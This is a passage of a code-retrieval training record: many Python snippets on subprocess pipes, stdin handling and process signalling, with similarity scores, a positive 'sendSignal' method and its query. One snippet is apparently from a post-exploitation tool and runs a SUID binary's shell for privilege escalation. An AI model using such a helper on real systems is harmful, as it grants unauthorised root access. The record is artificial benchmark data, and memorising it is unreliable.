#t3.join()\n #t4.join()\n\n stdout = open(stdout_name, 'rb')\n #stderr = open(stderr_name, 'rb')\n stderr.seek(0)\n\n task_output = {}\n task_output[\"stdout\"] = \"\".join(stdout.readlines())\n task_output[\"stderr\"] = \"\".join(stderr.readlines())\n\n stdout.close()\n stderr.close()\n os.remove(stdout_name)\n os.remove(stderr_name)\n\n if task.returncode != 0:\n self.logger.error(task.returncode)\n raise Exception(task_output[\"stdout\"], task_output[\"stderr\"])\n else:\n return task_output", "def subprocess_attach_stdin(cmd, shell=False):\n # type: (str, bool) -> subprocess.Process\n return subprocess.Popen(cmd, shell=shell, stdin=subprocess.PIPE)", "def popenCommunicate(args, data='', outputs=None, ignoreErrors=False, poll_interval=0.01):\n stdError = None\n if not ignoreErrors:\n stdError = subprocess.STDOUT\n p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=stdError)\n fcntl.fcntl(p.stdin, fcntl.F_SETFL, os.O_NONBLOCK) # make the file nonblocking\n fcntl.fcntl(p.stdout, fcntl.F_SETFL, os.O_NONBLOCK) # make the file nonblocking\n\n bytesTotal = len(data)\n bytesWritten = 0\n while bytesWritten < bytesTotal:\n try:\n # p.stdin.write() doesn't return anything, so use os.write.\n bytesWritten += os.write(p.stdin.fileno(), data[bytesWritten:])\n except IOError, ex:\n if ex[0] != errno.EAGAIN:\n raise\n sys.exc_clear()\n socket.wait_write(p.stdin.fileno())\n\n p.stdin.close()\n\n if outputs is not None:\n while True:\n try:\n chunk = p.stdout.read(4096) \n if not chunk:\n break\n for output in outputs:\n output.write(chunk)\n except IOError, ex:\n if ex[0] != errno.EAGAIN:\n raise\n sys.exc_clear()\n socket.wait_read(p.stdout.fileno()) \n\n p.stdout.close()\n\n length = None\n try:\n length = len(outputs[0])\n except:\n length = 0\n\n logging.getLogger().debug(\"popenCommunicate() finished. Args: %s, Output Length: %d\" % (args,length))", "def input_pipe():\n x = ''\n while True:\n x = yield x\n yield # to keep the generator in lock step with input", "def send_cmd(self):\n\n cmd = self.repl_input.get().encode()\n self.serial.write(cmd + b\"\\r\")\n self.repl_input.set(\"\")", "def non_blocking_streamlit(process: psutil.Popen) -> None:\n while process.is_running():\n process.communicate()", "def _on_read(self, line):\n # Some game logic (or magic)\n line = line.strip()\n logger.info(\"RCV> %s\", line)\n if not line:\n self.stream.close()\n return\n\n self.stream.write(\"echo: %s\\n\" % line)\n\n # Wait for further input on this connection\n self.wait()", "def dataReceived(self, data: bytes):\n\n if self.output:\n self.output.write(data) # redirect the message to the server", "def run(self):\r\n while self._go.isSet(): #while app is running\r\n if self._check_console_input(): #if something to read on the console\r\n cmd = sys.stdin.readline() #read it\r\n self.inq.put(cmd) #dispatch it tpo the server\r\n response = self.outq.get(timeout=2.0) #wait for an answer\r\n sys.stdout.write(response) #write the answer on the console\r", "def start(self, stdin=None, stdout=None, stderr=None):\n logging.debug(\"Starting '%s'\", \" \".join(self.cmd_line))\n self.proc = subprocess.Popen(self.cmd_line,\n stdin=stdin,\n stdout=stdout if stdout\n else subprocess.PIPE,\n stderr=stderr,\n env=self.env)\n self.thread = threading.Thread(target=self.tail)\n self.thread.daemon = True\n self.thread.start()\n self.running = True", "def watch(self):\n reader, writer = os.pipe2(0)\n\n pid = os.fork()\n\n # In the child\n if pid == 0:\n tty.setraw(0)\n os.close(reader)\n os.close(2)\n\n os.dup2(writer, 1)\n\n os.execlp(self.__program, self.__program, *self.__args)\n\n sys.exit(1)\n else:\n os.close(writer)\n\n while True:\n result = os.read(reader, 1024)\n if len(result) == 0:\n break\n sys.stdout.write(result.decode('utf-8'))\n\n os.waitpid(pid, 0)", "def main():\n dt = DropToken()\n play = True\n while play:\n try:\n line = sys.stdin.readline()\n except KeyboardInterrupt:\n break\n if not line:\n break\n play = dt.inputProcess(line)", "def pipestring_process(cmd_string, stdin_string=''):\n f=SpooledTemporaryFile()\n f.write(stdin_string)\n f.seek(0)\n results=process(cmd_string, stdin=f)\n f.close()\n return results", "def execute_sbatch(cmd_submit, stdin, env, cmd_nbscript): # pylint: disable=unused-argument\n p = subprocess.Popen(cmd_submit, stdin=subprocess.PIPE, env=env)\n p.stdin.write(stdin)\n p.stdin.close()\n p.wait()\n return p.returncode", "def process_data(data):\n bio = BytesIO()\n bio.write(data)\n bio.seek(0)\n process(bio)", "def _launch_command(args, out_cb, err_cb, done=None, **kwargs):\n\n def pump_stream(callback, stream):\n \"\"\"Pump the stream\"\"\"\n for line in stream:\n callback(line)\n callback(None)\n\n def joiner():\n \"\"\"Wait for streams to finish, then call done callback\"\"\"\n for th in threads:\n th.join()\n done(process)\n\n kwargs = kwargs.copy()\n in_data = kwargs.get(\"input\")\n if \"input\" in kwargs:\n del kwargs[\"input\"]\n assert kwargs.get(\"stdin\") is None, kwargs[\"stdin\"]\n kwargs[\"stdin\"] = PIPE\n elif \"stdin\" not in kwargs:\n kwargs[\"stdin\"] = DEVNULL\n kwargs.setdefault(\"stdout\", PIPE)\n kwargs.setdefault(\"stderr\", PIPE)\n kwargs[\"universal_newlines\"] = True # Text streams, not byte streams\n process = Popen(args, **kwargs)\n threads = []\n if process.stdout:\n thread = Thread(\n target=pump_stream, args=(out_cb, process.stdout), daemon=True\n )\n thread.start()\n threads.append(thread)\n if process.stderr:\n thread = Thread(\n target=pump_stream, args=(err_cb, process.stderr), daemon=True\n )\n thread.start()\n threads.append(thread)\n if done and threads:\n Thread(target=joiner, daemon=True).start()\n if in_data:\n process.stdin.write(str(in_data, \"utf-8\"))\n process.stdin.close()\n return process", "def _process_input(self, fd):\n if fd.fileno() == self._proxyfd.fileno():\n pkt = self._grab_packet(\n lambda data, s=self: s.create_packet(packet=data), fd)\n self._handle_proxy_packet(pkt)\n else:\n Server._process_input(self, fd)", "def send(self, payload):\n self.emitter.input(payload)", "def rawInput(string):\n if os.name == \"posix\":\n tcflush(sys.stdin, TCIFLUSH)\n return input(string)", "def set_up_ipc(self, data_queue, termination_event, stdin=None):\n\n # Store our IPC primitives, ready for future use.\n self.data_queue = data_queue\n self.termination_event = termination_event\n\n # Retrieve our use of the standard input from the parent thread.\n if stdin:\n self.stdin = sys.stdin = stdin", "def read_stdin():\n return \"\".join(sys.stdin.readlines()).strip()", "def start_stdio_server(self):\n ls = self.language_server(hub=self.hub)\n ls.start(sys.stdin.buffer, sys.stdout.buffer)", "def stdin():\n\n while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:\n\n line = sys.stdin.readline()\n\n if not line:\n yield from []\n break\n\n line = line.strip()\n yield line", "def hook() -> None:\n real_recv = process.recv_raw\n\n def recv(self: process, numb: int) -> bytes:\n data = real_recv(self, numb)\n # Sometimes the returned data is of type str\n # Accept them by converting them to bytes\n if type(data) == str:\n data = data.encode()\n try:\n stdout_all = self.stdout_all\n except Exception: # pylint: disable=broad-except\n stdout_all = b\"\"\n stdout_all += data\n self.stdout_all = stdout_all\n return data\n\n process.recv_raw = recv", "def _process(self):\n\n while True:\n try:\n sockets = [self.master_fd]\n if self.sock:\n sockets.append(self.sock)\n # Don't handle user input while a side command is running.\n if len(self.filter) == 1:\n sockets.append(pty.STDIN_FILENO)\n rfds, _, _ = select.select(sockets, [], [], 0.25)\n except select.error as ex:\n if ex[0] == errno.EAGAIN: # Interrupted system call.\n continue\n raise\n\n if not rfds:\n self._timeout()\n else:\n # Handle one packet at a time to mitigate the side channel\n # breaking into user input.\n if self.master_fd in rfds:\n data = os.read(self.master_fd, 1024)\n self.master_read(data)\n elif pty.STDIN_FILENO in rfds:\n data = os.read(pty.STDIN_FILENO, 1024)\n self.stdin_read(data)\n elif self.sock in rfds:\n data, self.last_addr = self.sock.recvfrom(65536)\n if data[-1] == b'\\n':\n self.log(\"WARNING: the command ending with <nl>. \"\n \"The StreamProxy filter known to fail.\")\n self.log(\"Got command '%s'\" % data.decode('utf-8'))\n command = self.filter_command(data)\n self.log(\"Translated command '{}'\"\n .format(command.decode('utf-8')))\n if command:\n self.write_master(command)\n self.write_master(b'\\n')", "def _stdout_reader(self):\n self._is_launched.wait()\n stdout_iterator = iter(self._popen.stdout.readline, b\"\")\n for line in stdout_iterator:\n self._log(\"raw\", \"stdout : {0}\".format(line.strip()))\n self.stdout_queue.put_nowait(line.strip())\n self.stdout_queue.put_nowait(None) # Stop queue consumers", "def start(self):\n # Create a pipe so the stream can be captured:\n self.pipe_out, self.pipe_in = os.pipe()\n self.capturedtext = \"\"\n\n # Save a copy of the stream:\n self.streamfd = os.dup(self.origstreamfd)\n\n # Replace the original stream with our write pipe:\n os.dup2(self.pipe_in, self.origstreamfd)", "def send_serial_command(data):\n print(data)\n serial_command = data\n SERIAL_PARENT.send(serial_command)\n OUTGOING.append(serial_command)", "def process(cmd_string, stdin=None):\n return process_results(process_run(cmd_string, stdin=stdin))", "def read_input(inp):\n epoll = select.epoll()\n epoll.register(sys.stdin.fileno(), select.EPOLLIN)\n while inp.running:\n if is_terminated():\n return\n\n events = epoll.poll(1)\n for fileno, event in events:\n line = \"[\"\n while \"[\" in line:\n line = sys.stdin.readline().strip(\",\").strip()\n inp.has_event = True\n try:\n event = json.loads(line)\n if \"instance\" in event:\n inp.callback(event)\n inp.redraw()\n except ValueError:\n pass\n epoll.unregister(sys.stdin.fileno())\n epoll.close()\n inp.has_event = True\n inp.clean_exit = True", "def read_input():\n\n read = sys.stdin.readlines()\n\n text = ''\n for line in read:\n text += line\n\n return text", "def write_stdout(self, data):\n filt, handler = self.filter[-1]\n data, filtered = filt.filter(data)\n self._write(pty.STDOUT_FILENO, data)\n if filtered:\n self.log(\"Filter matched %d bytes\" % len(filtered))\n self.filter.pop()\n assert callable(handler)\n res = handler(filtered)\n if res:\n self.sock.sendto(res, 0, self.last_addr)", "def write(self, data):\r\n try:\r\n char_handle = self._stdinout_characteristic.getHandle()\r\n bytes_sent = 0\r\n while bytes_sent < len(data):\r\n # Computing data to send.\r\n bytes_to_send = min(\r\n self._MAXIMUM_MESSAGE_SIZE_BYTES,\r\n len(data) - bytes_sent\r\n )\r\n data_to_send = data[bytes_sent:bytes_sent + bytes_to_send]\r\n\r\n # Writing data.\r\n self._node.writeCharacteristic(\r\n char_handle,\r\n data_to_send,\r\n True)\r\n bytes_sent += bytes_to_send\r\n\r\n # Calling on-write callback for a debug characteristic.\r\n self.on_write_characteristic(\r\n self._stdinout_characteristic, data_to_send, True)\r\n\r\n return bytes_sent\r\n\r\n except BTLEException as e:\r\n self._node._unexpected_disconnect()", "def communicate(args, **kwargs):\n stdin = None\n # When stdin is passed as an argument, use it as the actual input data and\n # set the Popen() parameter accordingly.\n if 'stdin' in kwargs and isinstance(kwargs['stdin'], basestring):\n stdin = kwargs['stdin']\n kwargs['stdin'] = PIPE\n\n proc = Popen(args, **kwargs)\n return proc.communicate(stdin), proc.returncode", "def run_process(self, inp=\"\"):\n return subprocess.run(self.binary,\n input=inp,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n universal_newlines=True)", "def recvraw(self):\n\n if self.stdin is None:\n return _python_input_function()\n else:\n return self.stdin.readline().rstrip('\\n')", "def threading_copy(self, data):\n r_fd, w_fd = os.pipe()\n rstream = os.fdopen(r_fd, \"rb\")\n wstream = os.fdopen(w_fd, \"wb\")\n copy_thread = threading.Thread(target=self.copystream, args=(rstream,))\n copy_thread.start()\n self.writestream(data, wstream)\n wstream.close()\n copy_thread.join()", "def server_do(self,input, connstream):\r\n pass", "def WriteToPipeIn(self, epAddr, data): \n return self._server.write_to_pipe_in(self._serial, epAddr, list(data))", "def runin(cmd, stdin):\n result = subprocess.Popen(cmd,stdin=subprocess.PIPE)\n result.wait()\n return result.returncode", "def connectionMade(self):\n self._pid = self.transport.pid\n if self._pid:\n self.logger(\"Process has pid %d\" % self._pid)\n self.transport.closeStdin() # close stdin", "def send(self, *args, **kwargs):\n if not self.paused():\n raise RuntimeError(\"Machine is not awaiting input\")\n else:\n self.args = (args, kwargs)", "def collect_incoming_data(self, data):\n self.__input.append(data)", "def execute(self, technique: Technique):\n\n binary = technique.ident\n enter, input, exit = binary.shell(self.pty.shell, suid=True)\n\n # Run the start commands\n self.pty.process(enter, delim=False)\n\n # Send required input\n self.pty.client.send(input.encode(\"utf-8\"))\n\n return exit # remember how to close out of this privesc", "def scan_input(self):\n proc = subprocess.Popen([\"ssh\", \"-tt\", \"pi@127.0.0.1\"],\n stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n # give time to connect\n time.sleep(5)\n proc.stdin.write(\n b\"/home/pi/Desktop/GAssist/env/bin/google-assistant-demo\\n\")\n proc.stdin.flush()\n while True:\n next_line = proc.stdout.readline()\n if next_line != '':\n # the real code does filtering here\n tmp = next_line.decode(\"utf-8\")\n print(tmp)\n tmp = tmp.strip().lower()\n for test_re in self.text_regexes:\n match_test = test_re.match(tmp)\n if match_test:\n self.handle_input(match_test.group(1).strip())\n else:\n time.sleep(.01)", "def communicate(self, std_in=None, timeout=0):\n if timeout <= 0:\n return super(Popen, self).communicate(input=std_in)\n\n fds = []\n stdout = []\n stderr = []\n\n if self.stdout is not None:\n set_file_nonblock(self.stdout)\n fds.append(self.stdout)\n if self.stderr is not None:\n set_file_nonblock(self.stderr)\n fds.append(self.stderr)\n\n if std_in is not None and sys.stdin is not None:\n sys.stdin.write(std_in)\n\n returncode = None\n inactive = 0\n while returncode is None:\n (rlist, dummy_wlist, dummy_xlist) = select.select(\n fds, [], [], 1.0)\n\n if not rlist:\n inactive += 1\n if inactive >= timeout:\n raise TimeoutError\n else:\n inactive = 0\n for fd in rlist:\n if fd is self.stdout:\n stdout.append(fd.read())\n elif fd is self.stderr:\n stderr.append(fd.read())\n\n returncode = self.poll()\n\n if self.stdout is not None:\n stdout = ''.join(stdout)\n else:\n stdout = None\n if self.stderr is not None:\n stderr = ''.join(stderr)\n else:\n stderr = None\n\n return (stdout, stderr)", "def live_network_input_to_pipe(iface=None, p=None):\n\n global g_pipein\n\n print(\"Named Pipe '{0}' has been opened for writing. Waiting for Pipe Reader to connect.\".format(p))\n g_pipein = open(p, 'wb')\n print(\"Connected to Named Pipe '{0}'. Writing binary TDMs into pipe.\".format(p))\n\n if iface is None:\n print(\"Listening on default interface.\")\n try:\n sniff(prn=write_tdm_to_pipe)\n except IOError as e:\n if e.errno == errno.EPIPE:\n print(\"Broken Pipe: EPIPE\")\n else:\n print(\"Listening on interface: {0}\".format(iface))\n try:\n sniff(iface=iface, prn=write_tdm_to_pipe)\n except IOError as e:\n if e.errno == errno.EPIPE:\n print(\"Broken Pipe: EPIPE\")", "def run_python_stdin(python, file_args=None, directives=None):\n import shutil\n import tempfile\n\n with tempfile.NamedTemporaryFile(suffix='.py') as f:\n shutil.copyfileobj(sys.stdin, f)\n f.flush()\n\n file_args = [f.name] + list(file_args or ())\n run_python_file(python, file_args, directives)", "def continuous_shell_reader(self):\n\n while not self.thread_stop.is_set():\n out = self.shell_reader()\n\n if not out == \"\":\n print(\"IPC: Received: {}\".format(out))", "def set_stdio(inp):\r\n default_stdin = sys.stdin\r\n sys.stdin = StringIO(inp)\r\n default_stdout = sys.stdout\r\n sys.stdout = mystdout = StringIO()\r\n return default_stdin, default_stdout, mystdout", "def pingAgentProcess( self ):\n try:\n self.lock.acquire()\n\n if self.agent is None or self.agent.poll() is not None:\n return\n\n self.agent.stdin.write( 'hello\\n' )\n self.agent.stdin.flush()\n finally:\n self.lock.release()", "def getch(self):\t # get 1 byte from stdin\n\t\treturn sys.stdin.read(1)", "def send_command(self, command):\n stdin, stdout, stderr = self.ssh_client.exec_command(command)\n return stdout.readlines()", "def send_enter():\n sys.stdout.write('\\x0D') # send carriage return\n sys.stdout.flush()" ]
[ "0.7741889", "0.7658585", "0.76509887", "0.75933856", "0.7503921", "0.7494124", "0.7365971", "0.7141076", "0.7000852", "0.6967747", "0.6881967", "0.68283165", "0.67600954", "0.6745928", "0.6668038", "0.6605815", "0.6481066", "0.64001137", "0.63949114", "0.6270043", "0.62556726", "0.62385255", "0.62025994", "0.6056685", "0.60175997", "0.6017262", "0.60026217", "0.59912366", "0.59847766", "0.59403116", "0.59341747", "0.59310734", "0.57677084", "0.5744669", "0.57191944", "0.57078475", "0.56990546", "0.56922996", "0.5688699", "0.5655805", "0.5649605", "0.5644868", "0.5624177", "0.5615417", "0.5592042", "0.55821157", "0.5565265", "0.5562639", "0.55599725", "0.5550713", "0.5526504", "0.5524541", "0.5524397", "0.5510715", "0.5508886", "0.54894966", "0.5480219", "0.54717577", "0.54670256", "0.54628044", "0.5445239", "0.54445964", "0.5417918", "0.53983766", "0.5393377", "0.5381578", "0.53750676", "0.5356832", "0.5355164", "0.5348384", "0.53448707", "0.5333086", "0.532736", "0.53266007", "0.5310466", "0.53100234", "0.5308773", "0.5300952", "0.5290379", "0.52886134", "0.52848065", "0.5284658", "0.527753", "0.527496", "0.52652955", "0.5259584", "0.52565193", "0.5255935", "0.5255432", "0.5253667", "0.52493566", "0.5249049", "0.5248646", "0.5247048", "0.5233346", "0.52290374", "0.5220966", "0.52144283", "0.5200266", "0.51953036" ]
0.65630895
16
Send a signal to the process
def sendSignal (self, signal) : data = streamModule.WriteBuffer() data.writeStruct('B', signal) return self.sendCommand("CMD_IN_DO_KILL", data.getvalue()).addCallback(self._sendSignal_result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def send_signal(self, sig):\n os.kill(self.pid, sig)", "def send_signal(self, signal):\n self.kill()", "def send_signal(self, sig):\n if self.thread.is_alive():\n self.process.send_signal(sig)\n else:\n lg.warning(\"Couldn't deliver signal \"\n \"to already dead process {} ({})\".format(self.command[0], self.process.pd)\n )", "def signalProcess(self, signal, name):\n if name not in self.protocols:\n return\n proc = self.protocols[name].transport\n try:\n proc.signalProcess(signal)\n except ProcessExitedAlready:\n pass", "async def send_signal(self, signum: int) -> None:\n signal_delivered = await self._send_signal_via_listener(signum)\n if not signal_delivered:\n # Fallback\n # if we have a local process, use its method, else determine if the ip is local or remote and issue\n # the appropriate version to signal the process.\n if self.local_proc:\n if self.pgid > 0 and hasattr(os, \"killpg\"):\n try:\n os.killpg(self.pgid, signum)\n return\n except OSError:\n pass\n self.local_proc.send_signal(signum)\n # else:\n # if self.ip and self.pid > 0:\n # if ip_is_local(self.ip):\n # self.local_signal(signum)\n # else:\n # self.remote_signal(signum)\n return", "def send_signal(self, sig):\r\n sig = { 0x01 : \"HUP\",\r\n 0x02 : \"INT\",\r\n 0x03 : \"NEWNYM\",\r\n 0x0A : \"USR1\",\r\n 0x0C : \"USR2\",\r\n 0x0F : \"TERM\" }.get(sig,sig)\r\n self.sendAndRecv(\"SIGNAL %s\\r\\n\"%sig)", "def signal(self, args):\n pass", "def send_signal(self, signum):\n if signum == 0:\n return self.poll()\n elif signum == signal.SIGKILL:\n return self.kill()\n else:\n # This is very likely an interrupt signal, so defer to the super class\n # which should use the communication port.\n return super(ContainerProcessProxy, self).send_signal(signum)", "def handler(signum, frame):\n m.signal()", "def signal(self):\n self.mainloop().signal()", "def signal(self):\n pass", "def kill(self, sig):\n\n # we parse the signal at the client level to reduce the time we pass\n # in the server.\n signum = parse_signal_value(sig)\n\n body = json.dumps({\"signal\": signum})\n self.server.request(\"post\", \"/jobs/%s/%s/signal\" % (self.sessionid,\n self.name), body=body)\n return True", "def signal(sig, action): # real signature unknown; restored from __doc__\n pass", "def signalProcess(self, signalID):\r\n params = {\r\n \"TERM\": (self._terminationDelay, 0),\r\n \"KILL\": (0, 1)\r\n }\r\n\r\n if self.pid is None:\r\n raise ProcessExitedAlready()\r\n\r\n if signalID in params:\r\n delay, status = params[signalID]\r\n self._signalHandler = self._reactor.callLater(\r\n delay, self.processEnded, status)", "def send_signal(self, sig: int = signal.SIGKILL, children: bool = False) -> Task:\n if self._process and self._process.pid is not None:\n kill(self._process.pid, sig=sig, children=children)\n return self", "def signal_handler(self, signum, frame):\n self._running = False", "def signal_handler(signal, frame):\n print()\n endProgram(0)", "def kill(self, signal: Union[str, int, None] = None):\n params = dict()\n if signal is not None:\n params[\"signal\"] = signal", "def test_signal_interruption(self):\n process = Popen(\n [STRATIS_CLI, \"pool\", \"create\",\n p_n(), DISKS[0]],\n stdout=PIPE,\n stderr=PIPE,\n close_fds=True,\n env=os.environ)\n time.sleep(0.05)\n process.send_signal(2)\n result = process.communicate()\n stdout_text = \"\"\n stderr_text = \"\"\n if result[0]:\n stdout_text = bytes(result[0]).decode(\"utf-8\")\n if result[1]:\n stderr_text = bytes(result[1]).decode(\"utf-8\")\n\n self.assertTrue(\"Traceback\" not in stdout_text)\n self.assertTrue(\"Traceback\" not in stderr_text)\n self.assertNotEqual(process.returncode, 0)", "def sighandler(signum, frame):\n global _terminate\n global _interruptcnt\n print >> FileKeyUtils.WMSlog, 'sighandler> ', signum\n ++_interruptcnt \n if signum in(signal.SIGABRT, signal.SIGINT, signal.SIGTERM):\n print >> FileKeyUtils.WMSlog, 'sighandler> terminate pid: ', os.getpid(), signum\n _terminate = True\n elif signum in(signal.SIGHUP, signal.SIGTSTP):\n print >> FileKeyUtils.WMSlog, 'sighandler> suspend/stop/pause pid: ', os.getpid(), signum\n signal.pause()\n else:\n print >> FileKeyUtils.WMSlog, 'sighandler> resume/continue pid: ', os.getpid(), signum\n _terminate = False", "def send(signal, *args, **kwargs):\n _dispatcher.send(signal=signal, *args, **kwargs)", "def cli():\n signal.signal(signal.SIGINT, signal_handler)\n pass", "def signal_handler(signal, frame):\n output.write(\"SIGTERM received (launch_simulations talking)\\n\")\n p.kill(15)\n sys.exit(1)", "def signal_handler(self, signum):\n raise Exception(\"Caught signal {0}\".format(signum))", "def _signal_handler(*args):\n self._user_exit = True", "def handler(signum, frame):\n print(\"Signal handler called with signal %i\" % signum)\n sys.exit(-1)", "def _signal_handler(*_: typing.Any) -> None:\n shutdown_event.set()", "def send_signal(self, signal):\n if self.in_spectator_mode: return None\n logger.debug(\"Node %s broadcasts signal %s\" % (self, signal))\n dispatcher.send(signal=signal, sender=self)", "def signal_handler(signum, frame):\n sys.exit(0)", "async def _send_signal_via_listener(self, signum: int) -> bool:\n # If the launcher returned a comm_port value, then use that to send the signal,\n # else, defer to the superclass - which will use a remote shell to issue kill.\n # Note that if the target process is running as a different user than the REMOTE_USER,\n # using anything other than the socket-based signal (via signal_addr) will not work.\n if self.comm_port > 0:\n signal_request = dict()\n signal_request['signum'] = signum\n\n try:\n await self._send_listener_request(signal_request)\n if signum > 0: # Polling (signum == 0) is too frequent\n self.log.debug(\"Signal ({}) sent via gateway communication port.\".format(signum))\n return True\n except Exception as e:\n if isinstance(e, OSError) and e.errno == errno.ECONNREFUSED: # Return since there's no process.\n return True\n\n self.log.warning(f\"An unexpected exception occurred sending signal ({signum}) \"\n f\"via listener for KernelID '{self.kernel_id}': {e}\")\n return False", "def signal_handler(sig, frame):\n raise ExitException()", "def _signal_handler(signum, frame):\n res_mgr()\n sys.exit(0)", "def kill(self):\n self.send_signal(signal.SIGKILL)", "def signal_handler(self, signal_number, frame):\n sys.exit(0)", "def signal(self):\n assert self._pa_threaded_mainloop is not None\n pa.pa_threaded_mainloop_signal(self._pa_threaded_mainloop, 0)", "def __before_termination__(self, sig):\n print(\"Ahhhh! I'm going to be killed. My pid:{}, signal received:{}\".format(self.pid, sig ) )", "def handler_sighup(signum, frame):\n global done, pipe\n\n try:\n pipe.flush()\n pipe.close()\n except:\n pass\n pipe = None\n done = True", "def _signal_handler(signalnum: int, _: Any) -> None:\n logger.info('Received signal: {0}', signal.Signals(signalnum).name)\n # safely close video stream & writer\n stream.stop()\n writer.close()\n sys.exit(0)", "def signal_handler(signum, frame):\n main.CLOSE = True", "def kill(pid, sig=signal.SIGTERM.value):\n pid = int(pid)\n sig = int(sig)\n proc = psutil.Process(pid)\n try:\n proc.send_signal(sig)\n return True\n except Exception as e:\n raise j.exceptions.RuntimeError(\"Could not kill process with id %s.\\n%s\" % (pid, e))", "async def remote_signal(self, sig):\n\n username = self.get_remote_user(self.user.name)\n k = asyncssh.read_private_key(self.ssh_keyfile.format(username=self.user.name))\n\n command = \"kill -s %s %d < /dev/null\" % (sig, self.pid)\n\n async with asyncssh.connect(self.remote_host,username=username,client_keys=[k],known_hosts=None) as conn:\n result = await conn.run(command)\n stdout = result.stdout\n stderr = result.stderr\n retcode = result.exit_status\n self.log.debug(\"command: {} returned {} --- {} --- {}\".format(command, stdout, stderr, retcode))\n return (retcode == 0)", "def signal_handler(sig_num, frame):\n global exit_flag\n logger.warn('Signal Recieved: {}'.format(str(sig_num)))\n if sig_num:\n exit_flag = True", "def signalProcess(self, processTag=None, event='cancel'):\r\n if processTag is None:\r\n self.mutex.clear()\r\n while not self.asyncQueue.empty():\r\n self.asyncQueue.get()\r\n self.asyncQueue.task_done()\r\n while not self.syncQueue.empty():\r\n self.syncQueue.get()\r\n self.syncQueue.task_done()\r\n toQueue = [PROCESS_MESSAGE, None, None, [], {}, self.processMessage()]\r\n for k in range(self.activeWorkers):\r\n self.asyncQueue.put(toQueue)\r\n return\r\n elif processTag not in self.activeList:\r\n raise Exception(\"%s is not an active process\"%processTag)\r\n cancel_event, wait_event, outProcessor = self.activeList[processTag]\r\n if event == 'cancel':\r\n cancel_event.clear()\r\n elif event == 'wait':\r\n wait_event.clear()\r\n args = (PROCESS_PAUSE, processTag,'Proceso pausado')\r\n kwargs = {}\r\n outProcessor(*args, **kwargs)\r\n\r\n elif event == 'resume':\r\n wait_event.set()\r\n args = (PROCESS_PAUSE, processTag, 'Proceso reanudado')\r\n kwargs = {}\r\n outProcessor(*args, **kwargs)\r\n else:\r\n cancel_event.clear()", "def signal_handler(self, signum, frame):\n if signum == signal.SIGINT:\n self.terminate = True\n elif signum == signal.SIGALRM:\n self.button_handler(self.BUTTON_PIN)", "def signal_handler(signal_number, stack_frame):\n if signal_number in [signal.SIGTERM, signal.SIGINT]:\n terminate_surveillance()", "def signal_handler(sig, frame):\n sys.exit(0)", "def __signalHandler(self, signalNumber, frame):\n self._loop = False", "def send_signal(self, dst=\"any\", tag=None, value=None, src=None):\n self._signal_pool.signal(src or self.name,dst,tag,value)", "def _sigint(self, signal, frame):\n self.disconnect = True\n if self.cardinal:\n self.cardinal.quit('Received SIGINT.')", "def kill(self, signal=None):\n\n return self.client.api.kill(self.id, signal=signal)", "def signal_oi(self):\n pass", "def signal_pid(pid, sig):\n try:\n os.kill(pid, sig)\n except OSError:\n # The process may have died before we could kill it.\n pass\n\n for i in range(5):\n if not pid_is_alive(pid):\n return True\n time.sleep(1)\n\n # The process is still alive\n return False", "def kill(self, sig):\r\n now = time.time()\r\n options = self.config.options\r\n\r\n # Properly stop processes in BACKOFF state.\r\n if self.state == ProcessStates.BACKOFF:\r\n msg = (\"Attempted to kill %s, which is in BACKOFF state.\" %\r\n (self.config.name))\r\n options.logger.debug(msg)\r\n self.change_state(ProcessStates.STOPPED)\r\n return None\r\n\r\n if not self.pid:\r\n msg = (\"attempted to kill %s with sig %s but it wasn't running\" %\r\n (self.config.name, signame(sig)))\r\n options.logger.debug(msg)\r\n return msg\r\n\r\n #If we're in the stopping state, then we've already sent the stop\r\n #signal and this is the kill signal\r\n if self.state == ProcessStates.STOPPING:\r\n killasgroup = self.config.killasgroup\r\n else:\r\n killasgroup = self.config.stopasgroup\r\n\r\n as_group = \"\"\r\n if killasgroup:\r\n as_group = \"process group \"\r\n\r\n options.logger.debug('killing %s (pid %s) %swith signal %s'\r\n % (self.config.name,\r\n self.pid,\r\n as_group,\r\n signame(sig))\r\n )\r\n\r\n # RUNNING/STARTING/STOPPING -> STOPPING\r\n self.killing = 1\r\n self.delay = now + self.config.stopwaitsecs\r\n # we will already be in the STOPPING state if we're doing a\r\n # SIGKILL as a result of overrunning stopwaitsecs\r\n self._assertInState(ProcessStates.RUNNING,ProcessStates.STARTING,\r\n ProcessStates.STOPPING)\r\n self.change_state(ProcessStates.STOPPING)\r\n\r\n pid = self.pid\r\n if killasgroup:\r\n # send to the whole process group instead\r\n pid = -self.pid\r\n\r\n try:\r\n options.kill(pid, sig)\r\n except:\r\n io = StringIO()\r\n traceback.print_exc(file=io)\r\n tb = io.getvalue()\r\n msg = 'unknown problem killing %s (%s):%s' % (self.config.name,\r\n self.pid, tb)\r\n options.logger.critical(msg)\r\n self.change_state(ProcessStates.UNKNOWN)\r\n self.pid = 0\r\n self.killing = 0\r\n self.delay = 0\r\n return msg\r\n\r\n return None", "def handler(signum, frame):\n logging.warning(\"Got a {} signal. Doing nothing\".format(signum))", "def _on_parent_process_kill(self):", "def send(self, signal, msg=\"\"):\n self.transport.write(str(str(signal) + msg).encode())", "def restart_worker_sig_handler(signum, frame):\n worker.logger.warn(\"Restarting celeryd (%s)\" % (\n \" \".join(sys.argv)))\n worker.stop()\n os.execv(sys.executable, [sys.executable] + sys.argv)", "def signalAll(self, signal, startswithname=None):\n for name in self.processes.keys():\n if startswithname is None or name.startswith(startswithname):\n self.signalProcess(signal, name)", "def kill(self):\n self._stop_proc(signal.SIGKILL)", "def signal_handler(self, signal, frame):\r\n print 'You pressed Ctrl+C!'\r\n sys.exit(0)", "def signal_handler(signal, frame):\n sys.exit(0)", "def signal_handler(signal, frame):\n sys.exit(0)", "def signal_handler(signal, frame):\n sys.exit(0)", "def kill_all_processes(self, signal=signal.SIGINT) -> None:\n for task_name, sp in self.process_queue:\n sp.send_signal(signal)", "def kill(name, signal=9, exact=False):\n for pid in find(name, exact):\n run(\"kill -s {0} {1}\".format(signal, pid))", "def stop(self, signal):\n pass", "def stop(self, signal):\n pass", "def send(signal, sender=dispatcher.Anonymous, *args, **kwargs):\n logger.debug('Sending {} from {}'.format(signal, sender))\n return dispatcher.send(signal, sender, *args, **kwargs)", "def _send_signal(\n self,\n signal : 